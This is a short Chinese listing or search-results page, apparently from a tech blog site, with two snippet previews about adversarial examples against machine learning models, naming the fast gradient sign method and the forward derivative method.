  • 全文共2637字,预计学习时长5分钟 ...对抗攻击是一种用来寻找图像或数据的样本,机器学习模型在这些样本上完全随机地运行。除此之外,这些对抗样本中的网络输出可以被制作成任何期望输出类。随之而来的结果...
  • 介绍两种方法:the fast gradient sign method、the forward derivative method主要贡献:形式化对抗样本优化问题、将对抗扰动加到其他输入中、评估了文本对抗样本表现2. 关于循环神经网络机器学习、神经网络、循环...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 444
精华内容 177
关键字:

对抗制